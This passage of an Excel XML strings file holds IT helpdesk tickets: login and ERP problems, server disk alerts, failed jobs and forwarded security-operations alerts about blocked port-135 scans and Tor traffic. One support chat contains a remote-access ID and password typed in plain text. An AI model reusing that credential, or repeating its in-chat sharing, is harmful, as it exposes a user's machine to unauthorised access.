               please see attached symantec message i keep getting every time a switch my lap top on._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to boot system to windows</t>
  </si>
  <si>
    <t>fhiauwkz vwcqrohl</t>
  </si>
  <si>
    <t>netweaver password is not working.</t>
  </si>
  <si>
    <t>bluetooth mouse is not working.</t>
  </si>
  <si>
    <t>unable to login past see</t>
  </si>
  <si>
    <t>bkzcfmse naslrwdb</t>
  </si>
  <si>
    <t>security incidents - ( dsw incident no ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_1089</t>
  </si>
  <si>
    <t>========================
incident overview
=========================
we have detected at least 114 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1089/41.53.25.402 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:
 1. an infection on this host
 2. a misconfigured firewall
 3. a misconfigured host
 4. port scan (authorized or unauthorized)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1) ticket only escalation for these alerts where the traffic was blocked (explicit notification via a medium priority ticket (no phone call))
2) automatically resolve these alerts where the traffic was blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)
sincerely,
secureworks soc
=========================
technical details
=========================
historically, there have been various worms/malware that have used ports 135, 137, 138, 139, and 445 to propagate. examples include:
-w32.blaster.worm/msblast/lovsan 
-w32.welchia/nachi
-w32.reatle
port 135 - microsoft epmap (end point mapper), also known as dce/rpc locator service
port 137 - netbios netbios name service
port 138 - netbios netbios datagramdnty service
port 139 - netbios netbios session service
port 445 - microsoft-ds smb file sharing
additional information on these ports and best practices can be found at the following sites:
=========================
references
=========================
=========================
event data
=========================
related events: 
event id: 307897058
event summary: internal outbreak for 135/tcp
occurrence count: 114
event count: 1
host and connection information
source ip: 41.53.25.402
source hostname: HostName_1089
source port: 57257
destination hostname: apusm014
destination port: 135
connection directionality: internal
protocol: tcp
device information
device ip: 18.79.63.203
device name: company-internal-asa.company.com-1
log time: 2016-08-21 at 00:15:40 utc
action: blocked
cvss score: -1 
scwx event processing information
sherlock rule id (sle): 537074
inspector rule id: 186739
inspector event id: 042405443
ontology id: 200020003203009144
event type id: 200020003203009044
agent id: 103611
event detail:
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57257 to 10.44.23.31/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57258 to 12.41.82.8126/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57418 to 14.63.28.418/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57427 to 47.92.04.2434/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57421 to 28.04.06.289/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57477 to 45.34.25.3417/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57478 to 51.25.46.284/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57260 to 10.16.14.113/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57259 to 70.87.83.79245/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57261 to 37.10.37.1764/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57262 to 72.37.71.786/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57263 to 10.16.114.16/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57264 to 54.72.31.824/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57265 to 96.78.23.4576/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57442 to 93.47.24.501/135 flags syn on interface inside
aug 21 00:15:40 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 41.53.25.402/57447 to 63.96.56.492/135 flags syn on interface inside</t>
  </si>
  <si>
    <t>downgrade to ie10</t>
  </si>
  <si>
    <t>warehouse_tool quality issues when high link utlization at usa</t>
  </si>
  <si>
    <t xml:space="preserve">warehouse_tool quality issues when high link utilization at usa, </t>
  </si>
  <si>
    <t>qoiyjcah zxevofwn</t>
  </si>
  <si>
    <t>monitor orientation error</t>
  </si>
  <si>
    <t>company owned iphone stolen</t>
  </si>
  <si>
    <t xml:space="preserve">microsoft password reset </t>
  </si>
  <si>
    <t>rdwpangu lybaxonw</t>
  </si>
  <si>
    <t>qlhmawgi sgwipoxn password not working</t>
  </si>
  <si>
    <t>name:inhekdol anvqzdif
language:
browser:microsoft internet explorer
email:inhekdol.anvqzdif@gmail.com
customer number:
telephone:x2231
summary:please call aerp. spengineering toolometer computer is down. no foundry posrt floor samples can be analyzed. will have to shut down posrting floor. critical!</t>
  </si>
  <si>
    <t xml:space="preserve">please get some ramdnty for me.  </t>
  </si>
  <si>
    <t>etime is not working</t>
  </si>
  <si>
    <t>nhixruet elnjqdwg</t>
  </si>
  <si>
    <t>please check josh's % in the phones</t>
  </si>
  <si>
    <t>anpwcmdh tjsgualn</t>
  </si>
  <si>
    <t>setup access for ethics</t>
  </si>
  <si>
    <t>server migration germany - we are not able to access any files in folder ce_cs at the new server</t>
  </si>
  <si>
    <t>xpcunegv eyxwmzgk</t>
  </si>
  <si>
    <t>security incidents - ( #in33669678 ) : possible tor activity - source: android-802d0edc4e509a9</t>
  </si>
  <si>
    <t>source ip: 93.115.241.50
source hostname: 93.115.241.50.ch-center.com.
destination ip: 10.16.85.116
destination hostname: android-802d0edc4e509a9
system name :
user  name:pethrywr sahl(sghtyhlp)
location : koenigsee
sep , sms status : no updates
field sales user ( yes / no) :  no
dsw event log:see below
----------------------------------------------------------------------------------------
=========================
event data
=========================
related events: 
event id: 307636804
event summary: denied icmp trafficdenied icmp type=3, code=3
occurrence count: 4
event count: 1
host and connection information
source ip: 209.126.230.71
source hostname: internetsurvey-2.erratasec.com.
source ip geolocation: atlanta, usa
connection directionality: incoming
protocol: icmp
device information
device ip: 18.79.63.203
device name: company-internal-asa.company.com-1
log time: 2016-08-20 at 00:21:56 utc
action: blocked
cvss score: -1 
scwx event processing information
sherlock rule id (sle): 756571
inspector event id: 041814438
ontology id: 200020003203009212
event type id: 200020003203009112
agent id: 103611
event detail:
aug 20 00:21:56 18.79.63.203 %asa-3-313001: denied icmp type=3, code=3 from 209.126.230.71 on interface outside</t>
  </si>
  <si>
    <t>server migration germany; contactperson: cioehrnq wfyhgelz &lt;cioehrnq.wfyhgelz@gmail.com&gt;</t>
  </si>
  <si>
    <t>no access to data on the server! can't proceed customer orders!</t>
  </si>
  <si>
    <t>gbtshxqn nbvmceyx</t>
  </si>
  <si>
    <t>erp won't allow me to create an attachment to customer account</t>
  </si>
  <si>
    <t xml:space="preserve">when trying to attach tax exemption forms to the customer account in erp, i am not able to access the network drive they are stored on and am receiving an error message. i have attached the message to this incident. i am trying to access the "m" drive. </t>
  </si>
  <si>
    <t>user has questions on the use of password_management_tool password manager.</t>
  </si>
  <si>
    <t xml:space="preserve">everytime i click something in erp i hear an annoying clcking sound.also when i try to access a document </t>
  </si>
  <si>
    <t xml:space="preserve">at the header  i get this pop up   erp gui  security that says  the system is trying to create the file_x000D_
_x000D_
c:\erp\erp gui\35683166confirmationofhpcpo#113568_20160822132958.453_x.msg_x000D_
_x000D_
in the directory_x000D_
_x000D_
c:\erp\erp gui\_x000D_
_x000D_
do you want to usa the permission to modify the parent directory and all its subdirectories?_x000D_
_x000D_
and gives me a choice of allow, deny or help   _x000D_
_x000D_
i cannot open the attachment_x000D_
</t>
  </si>
  <si>
    <t>replacing current laptop</t>
  </si>
  <si>
    <t>thomklmas is replacing current laptop.</t>
  </si>
  <si>
    <t>will not come up</t>
  </si>
  <si>
    <t>not showixepyfbga wtqdyoin drive at all</t>
  </si>
  <si>
    <t>my email isn't updating in the morning</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: pjxclyhs.fcniljtu@gmail.com_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t>ticket update on inplant_852749</t>
  </si>
  <si>
    <t>password problem</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
my password is locked when i log in company network. i have to sign in </t>
  </si>
  <si>
    <t>audio not working</t>
  </si>
  <si>
    <t>erp blank screen</t>
  </si>
  <si>
    <t>unable to start the computer. its showing startup repair.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1314 failed in job_scheduler at: 08/22/2016 08:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1314 failed in job_scheduler at: 08/22/2016 08:45:00</t>
  </si>
  <si>
    <t>reset passwords for horeduca ogrhivnm using password_management_tool password reset.</t>
  </si>
  <si>
    <t>erp SID_34 password reset (requested by ughzilfm cfibdamq)</t>
  </si>
  <si>
    <t>i am trying to open a file attached to a crm and the extension is .rar i cannot open this file</t>
  </si>
  <si>
    <t>the is a file attached to a crm i am trying to work on and it has .rar as the extension.  i cannot open this file and i do not know what a .rar file is.</t>
  </si>
  <si>
    <t>iljahycm cknjzewf</t>
  </si>
  <si>
    <t>read and write access for m drive folder</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: nrbgctwm.kfwdhrmt@gmail.com
hi,
please provide read and write access of following folders in m drive
m:\pu5 coating data base\database\production data day wise
m:\pu5 coating data base\database\production data month wise
m:\pu5 coating data base\database\pu5 production database
computer name and user id details are as per the below list
slno
system number
user i.d
access
read
write
1
awyw8911478
awysinic2
[cid:image001.png@01d1fca0.50f1dd10]
[cid:image001.png@01d1fca0.50f1dd10]
sbfhydeep kurtyar 
pu5 coating and grinding operations
nrbgctwm.kfwdhrmt@gmail.com&lt;mailto:nrbgctwm.kfwdhrmt@gmail.com&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">unable to outlook </t>
  </si>
  <si>
    <t>nsqwfchp eqgoitdn</t>
  </si>
  <si>
    <t>reset the password for mfvkxghn mzjasxqd on other / SID_1 in erp</t>
  </si>
  <si>
    <t>i need my password set for the quality assurance area SID_1</t>
  </si>
  <si>
    <t>bitte einen arbeitszeitplan erstellen fÃ¼r die mitarbeiterin rnibmcve xukajlvg, pers.-nr. 58938</t>
  </si>
  <si>
    <t>bitte einen arbeitszeitplan erstellen fÃ¼r die mitarbeiterin rnibmcve xukajlvg, pers.-nr. 58678938:
sollarbeitszeit/woche:   17,5 stunden
arbeitstage:   dienstag, donnerstag, samstag
start: 13.09.2016</t>
  </si>
  <si>
    <t>aglsimtd ovnyhizx</t>
  </si>
  <si>
    <t>ticket update on ticket_no0428491</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_746w failed in job_scheduler at: 08/22/2016 08:08:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_746w failed in job_scheduler at: 08/22/2016 08:08:00</t>
  </si>
  <si>
    <t>skype -disconnecting of skype calls- more then 5 times in 5 minutes from koenigsee to germany during a conference call</t>
  </si>
  <si>
    <t>skype - disconnecting of skype calls - more then 5 times in 5 minutes from koenigsee to germany during a conference call_x000D_
also internetconnection is very slow</t>
  </si>
  <si>
    <t>qdxyifhj zbwtunpy</t>
  </si>
  <si>
    <t>account getting locked each monday</t>
  </si>
  <si>
    <t>xmebhckt yrnwqfbp</t>
  </si>
  <si>
    <t>atualizaÃ§Ã£o programdntya ted</t>
  </si>
  <si>
    <t>preciso entregar as declaraÃ§Ãµes e o programdntya ted nÃ£o estÃ¡ funcionando.</t>
  </si>
  <si>
    <t>vip 2 symantec login does not synch passwords through hitacni password system; how to update &amp; synch symantec password?</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/22/2016 07:48:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/22/2016 07:48:00</t>
  </si>
  <si>
    <t>zugriffsrechte auf den ordner ce-teamleiter</t>
  </si>
  <si>
    <t>freigabe durch hr. grergtger</t>
  </si>
  <si>
    <t>wfbkucds qaxhbois</t>
  </si>
  <si>
    <t xml:space="preserve">set back document </t>
  </si>
  <si>
    <t xml:space="preserve">t: +49
please set back this document to status 01.06.2016
m:\dispo\avfertigungszeiten\arbeitsplaner-arbeitssteuerer\te-beschichtung\te-fÃ¼r schneidplatten\te - sk-pvd beschichten auf metaplasanlage .xls
</t>
  </si>
  <si>
    <t>pjrhqkne ewruqyds</t>
  </si>
  <si>
    <t>SID_34 - erp production account locked out</t>
  </si>
  <si>
    <t>krutjqwp qomksnhd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/22/2016 07:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/22/2016 07:25:00</t>
  </si>
  <si>
    <t>reset password for erp - vvkthyiska account blocked</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: krutjqwp.qomksnhd@gmail.com
hello team,
could you please reset my password for the erp, user vvkthyiska, by mistake i blocked my account, i entered 3 times the wrong password.
</t>
  </si>
  <si>
    <t>help with excel that updates from crm</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: eqwaiphc.qxwfeuth@gmail.com
could you please advise what steps i should take to allow the attached spreadsheet to refresh data from crm?   below is the error message that i get when i open and enable content.
[cid:image001.jpg@01d1fc45.6ce205f0]
mictbdhryhle w.  burnhntyham
regional key account manager â€“ msc east coast
eqwaiphc.qxwfeuth@gmail.com&lt;mailto:eqwaiphc.qxwfeuth@gmail.com&gt;
</t>
  </si>
  <si>
    <t>missing archive email</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rcbdyslq.zuspjbtw@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i don't have archive emails. the lauacyltoe hxgaycze i can found is from 2014 and i should be able to see emails from 2012._x000D_
my local pc support ojrplsmx wslifbzc already checked it and he can't find it as well._x000D_
_x000D_
i urgently need emails from 2013!_x000D_
please advise_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/22/2016 07:14:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/22/2016 07:14:00</t>
  </si>
  <si>
    <t>password misplaced</t>
  </si>
  <si>
    <t>djwkpmhl kbgjnywa</t>
  </si>
  <si>
    <t>edi bestellungen der ksb ag</t>
  </si>
  <si>
    <t xml:space="preserve">sehr geehrte damen und herren,_x000D_
_x000D_
kÃ¶nnen sie mich bitte zu den edi bestellungen der ksb ag kurz anrufen?_x000D_
_x000D_
_x000D_
freundliche grÃ¼ÃŸe / kind </t>
  </si>
  <si>
    <t>re: deployment notification | telephony_software 2016</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: urvitans.laqdwvgo@gmail.com_x000D_
_x000D_
hi can we run the deployment once for the german language for the former germany location._x000D_
for the following targets_x000D_
_x000D_
efdl8111324_x000D_
efdl8111336_x000D_
efdw8111224_x000D_
efdw8111372_x000D_
efdl8111328_x000D_
efdl8111169_x000D_
edfl8111329_x000D_
edfl8111361_x000D_
edfw8111363_x000D_
edfl8111326_x000D_
edfw8111143_x000D_
edfw8111360_x000D_
edfw8111133_x000D_
edfl8111320_x000D_
efdw8111134_x000D_
_x000D_
please let me know when we can plan this._x000D_
_x000D_
as the location is just moved this weekend we can't do it manually right now._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>reset password - karnos</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zrpemyab.xvzwcbha@gmail.com_x000D_
_x000D_
dear it team,_x000D_
_x000D_
please help reset password for user :  karnos_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>i'm no more able to find a folder in outlook.</t>
  </si>
  <si>
    <t xml:space="preserve">ic_x000D_
 welcome, our next available agent will be with you shortly..._x000D_
 all agents are busy assisting other customers._x000D_
 interaction alerting agent._x000D_
 website visitor has joined the conversation_x000D_
gxuvbcpr libcktnm_x000D_
 hello_x000D_
dwfiykeo argtxmvcumar3_x000D_
 hello_x000D_
gxuvbcpr libcktnm_x000D_
 i'm sorry to disturb you for such an issue but i'm no more able to find a folder in my outlook_x000D_
 i don't think i deleted it but i can't see it anymore_x000D_
dwfiykeo argtxmvcumar3_x000D_
 can i have access to your system, please ?_x000D_
_x000D_
gxuvbcpr libcktnm_x000D_
 sure. what way?_x000D_
 teamviewer or skype?_x000D_
dwfiykeo argtxmvcumar3_x000D_
 team viewer , please _x000D_
gxuvbcpr libcktnm_x000D_
 id: 924881243_x000D_
 pw: 6749_x000D_
gxuvbcpr libcktnm_x000D_
 hello,_x000D_
gxuvbcpr libcktnm_x000D_
 the folder i can't find anymore is named "transportation markhtyet" and it was just below "transportation" on_x000D_
 one_x000D_
dwfiykeo argtxmvcumar3_x000D_
 he_x000D_
ic_x000D_
 website visitor has left the conversation_x000D_
</t>
  </si>
  <si>
    <t>delete the charm- 7000006672</t>
  </si>
  <si>
    <t xml:space="preserve">delete the charm 8111117783 as the configuration is done already and it was issue in  the bex report. </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/22/2016 06:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/22/2016 06:01:00</t>
  </si>
  <si>
    <t>unable to login to citrix</t>
  </si>
  <si>
    <t>zthxyfpn ctsgrafo</t>
  </si>
  <si>
    <t>probleme mit login \ypladjeu wzfryxav</t>
  </si>
  <si>
    <t>probleme mit outlook \dtlmbcrx mwuateyx</t>
  </si>
  <si>
    <t>drucker funktioniert nicht \puxsvfwr cwkjruni</t>
  </si>
  <si>
    <t>confirmations in bls (beschichtungsleitstand) not transfered to EU_tool</t>
  </si>
  <si>
    <t xml:space="preserve">location: germany, coating department cvd_x000D_
_x000D_
example: batch 16721 (it happens regularly)_x000D_
_x000D_
every order of 16721 miss the confirmation packing fhurakgsl mldufqov in EU_tool (german: packen zum beschichten) however it was confirmed in bls. usually confirmations done in bls are transfered automatically into EU_tool. production planner need to close these gaps now by manually confirming missing process steps. the incident has also impact on our performance indicators, as time for packing is not credited in the system. _x000D_
_x000D_
batch 16721 is a current example. the issue arised already in the past. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>unable to open the order confirmation from the erp</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rslvwpnh.emkfpqiy@gmail.com_x000D_
_x000D_
please find the snap shot of the screen._x000D_
_x000D_
am unable to open the url : _x000D_
_x000D_
[cid:image001.jpg@01d1fc86.94db1ce0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rslvwpnh emkfpqiy</t>
  </si>
  <si>
    <t xml:space="preserve">system disk of server HostName_698 is full </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fbyusmxz.kxvmcbly@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
system disk c: of server HostName_698 is full â€“ please check._x000D_
it is the virtual center server._x000D_
</t>
  </si>
  <si>
    <t>persÃ¶nliches laufwerk "adelhmk" nicht mehr verfÃ¼gbar nach servermigration</t>
  </si>
  <si>
    <t>bitte scghhnellstmÃ¶glich persÃ¶nliches laufwerk "adelhmk" wiederherstellen. _x000D_
_x000D_
personal drive "adelhmk" unavailable after server migration</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 08/22/2016 04:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 08/22/2016 04:51:00</t>
  </si>
  <si>
    <t>crm problems</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rugdyxqh.aqvocmuy@gmail.com_x000D_
_x000D_
good day all_x000D_
_x000D_
i am having problems with crm the system does not open and does not prompt for a password_x000D_
seemor current month outlook does not appear on the screen_x000D_
_x000D_
kind </t>
  </si>
  <si>
    <t xml:space="preserve">when i double click on a production order in erp 11 reporting under md04 the distribution icon does not come up </t>
  </si>
  <si>
    <t xml:space="preserve">i have no where to insert an amount to allow me to ship. i can be reached at </t>
  </si>
  <si>
    <t>drucker findet scan-adresse nicht</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: fdqjsygx.aivdjqtr@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
beim scannen findet der drucker em 96 die voreingestellte adresse nicht._x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>5 pos cannot be posed in miro as the same message</t>
  </si>
  <si>
    <t xml:space="preserve">the attachements are each of  the 5 pos error message shown in miro. they cannot be posed in erp for same problem. please help settle them. </t>
  </si>
  <si>
    <t>sound issue</t>
  </si>
  <si>
    <t xml:space="preserve">sound not working </t>
  </si>
  <si>
    <t>engineering_tool advance search-issue</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sihtvocw.yspnqxgw@gmail.com
hello
we ran report with sales person name as atuldhy gurpthy. however we got below reports which are not matching to the user searched. kindly check:
[cid:image001.jpg@01d1fc7a.7d98a360]
[cid:image002.jpg@01d1fc7a.7d98a360]
best </t>
  </si>
  <si>
    <t>telephony_software input issue--  enter one number or letter  output double when reply email in new telephony_software software</t>
  </si>
  <si>
    <t>since telephony_software software upgrading , if  input a number or letter , it get double .the show is two duplicate numbers .for example, i enter "3014377", shows as "22990033226666" .pls find attachment for printerscreen.please help to solve as soon as possible</t>
  </si>
  <si>
    <t>hmutkgze ngilcqky</t>
  </si>
  <si>
    <t>Ã¶ffnen von exel_anhÃ¤ngen ( 0043 664 4688892)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: soldfnbq.uhnbsvqd@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
ich kann keinen exel-anhang Ã¶ffnen, auch nicht wenn ich diesen speicher und dann Ã¶ffne._x000D_
[cid:image001.png@01d1fc59.bf242140]_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen/ best </t>
  </si>
  <si>
    <t>erp and network access limitation</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: pzybmcqd.fxtemlyg@gmail.com
hello it,
various of our users are linked to the network but cannot log into erp or get onto the local network drive to access the files.
do to however are linked on the network (they can use internet explorer ).
like users: andthyerh
cvdebrc
vvmathkag
i with username: vanthyrdys can access every system without any issues
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 08/22/2016 03:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 08/22/2016 03:33:00</t>
  </si>
  <si>
    <t>kpm not working</t>
  </si>
  <si>
    <t>hours punched on task are not visible in kpm</t>
  </si>
  <si>
    <t>mbkxwcav wsfvmpzg</t>
  </si>
  <si>
    <t>ebhsm004: e:/ is now 91% utilized.</t>
  </si>
  <si>
    <t>e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over _x000D_
 85% space consumed. space available: 4.4 g</t>
  </si>
  <si>
    <t xml:space="preserve"> rqxsm004 : f:/ is now 96% utilized.</t>
  </si>
  <si>
    <t>f:\ label:dat2-rqxsm004 dc86ed35 on server: rqxsm004 is over _x000D_
 85% space consumed. space available: 2.8 g</t>
  </si>
  <si>
    <t>HostName_30 : g:\ label:wsp e26ca13a is now 96% utilized.</t>
  </si>
  <si>
    <t>g:\ label:wsp e26ca13a on server: HostName_30 is over _x000D_
 85% space consumed. space available: 4.2 g</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_403 failed in job_scheduler at: 08/22/2016 03:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_403 failed in job_scheduler at: 08/22/2016 03:00:00</t>
  </si>
  <si>
    <t>setup new laptop fÃ¼r roboworker \qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>bad printing quality at rn33</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: yfmaqovp.wdonhbez@gmail.com
hello,
we use our printer rn33 (germany fm) for printing of production papers and drawings in one step.
at the moment we have a very bad quality on the drawings and production papers.
we changed the toner. the toner is the original hp same as the printer.
our it (tewgersy tgryudf) checked the printer also. regarding his checking the printer works correct.
we did uacyltoe hxgaycze print from word -&gt; good quality.
uacyltoe hxgaycze print form erp -&gt; bad quality.
regarding his suggestions should we check the print paramdntyeters of erp.
could you recheck this please?
was there a change?
</t>
  </si>
  <si>
    <t>setup new ws \sqlmtixr urhbvfgd</t>
  </si>
  <si>
    <t>awysv004 esxi host down</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
c:\users\virakv&gt;ping awysv004_x000D_
_x000D_
pinging awysv004.company.com [10.38.20.34] with 32 bytes of data:_x000D_
request timed out._x000D_
request timed out._x000D_
request timed out._x000D_
request timed out._x000D_
_x000D_
ping statistics for 10.38.20.34:_x000D_
    packets: sent = 4, received = 0, lost = 4 (100% loss),_x000D_
</t>
  </si>
  <si>
    <t>mb5b download</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: azovgeck.zuwnxdbt@gmail.com_x000D_
_x000D_
hello,_x000D_
i had construct with mb5b in erp a layout (display options) with the name "mb5b richthammer". since today i canÂ´t choose this layout anymore. only one layout i could collect, but itÂ´s not one i had created._x000D_
_x000D_
[cid:image004.jpg@01d1fc51.adaef550]_x000D_
_x000D_
the layout should look like this:_x000D_
[cid:image010.jpg@01d1fc4a.3f592000]_x000D_
_x000D_
but at the moment it look like this:_x000D_
[cid:image012.jpg@01d1fc4a.3f592000]_x000D_
_x000D_
can you please help me to get the layout â€žmb5b richthammer" back?_x000D_
</t>
  </si>
  <si>
    <t>azovgeck zuwnxdbt</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1390 failed in job_scheduler at: 08/22/2016 02:39:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1390 failed in job_scheduler at: 08/22/2016 02:39:00</t>
  </si>
  <si>
    <t>data backup profile update</t>
  </si>
  <si>
    <t>help to update the profile and data backup from old pc to new pc</t>
  </si>
  <si>
    <t>bildschirm im rÃ¼ckmeldeterminal 6 (gegenÃ¼ber kln-reinigungsanlage) defekt.</t>
  </si>
  <si>
    <t>customer master</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rgtarthi.erjgypa@company.com_x000D_
_x000D_
hello help,_x000D_
_x000D_
-customer-master india -customer-master.india@company.com&lt;mailto:-customer-master.india@company.com&gt; â€“ is not getting updated with lauacyltoe hxgaycze mail since morning._x000D_
_x000D_
[cid:image001.png@01d1fc64.17e6b5e0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/22/2016 02:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/22/2016 02:13:00</t>
  </si>
  <si>
    <t>carcau michthey  my password expires in 1 day</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vlcexqpg.vjrtqobx@gmail.com_x000D_
_x000D_
hello ,_x000D_
_x000D_
when i use the login _x000D_
would you be so kind to help me ?_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>vlcexqpg vjrtqobx</t>
  </si>
  <si>
    <t>tablet - dell 7350 - windowsç³»ç»Ÿå¯åŠ¨åŽé»‘å±ã€‚</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
windowsç³»ç»Ÿå¯åŠ¨åŽé»‘å±ã€‚</t>
  </si>
  <si>
    <t>hymjicru ckrxqfes</t>
  </si>
  <si>
    <t>please add office printer in my new laptop</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qrnusygw.amiebrlf@gmail.com_x000D_
_x000D_
dear sir,_x000D_
_x000D_
please add the office printer (which is connected with company vpn) in my new laptop._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>qrnusygw amiebrlf</t>
  </si>
  <si>
    <t>vvthuenka</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aksthyuhath.shettythruy@company.com
hi,
mr. ofuhdesi rhbsawmf is not able to login ess portal. please reset the password and share it with his manager.
emp no
name
useid
manager
20245767
ofuhdesi rhbsawmf
vvthuenka
ebkfwhgt flapokym
with </t>
  </si>
  <si>
    <t>hr_tool java doesn't work</t>
  </si>
  <si>
    <t xml:space="preserve">wegen file-server austausch kein zugriff auf datenbank mÃ¶glich!!  </t>
  </si>
  <si>
    <t>wegen file-server austausch kein zugriff auf datenbank mÃ¶glich!!  eemw8144361; eemw8144255; eemw8144362 bitte hr. sudghnthdra mit kontaktieren. eilig!!!!</t>
  </si>
  <si>
    <t>kein zugriff von abteilung ce abstech eemw8144218 auf  datenbanken: betap_profil, betapdachform, betapfasen</t>
  </si>
  <si>
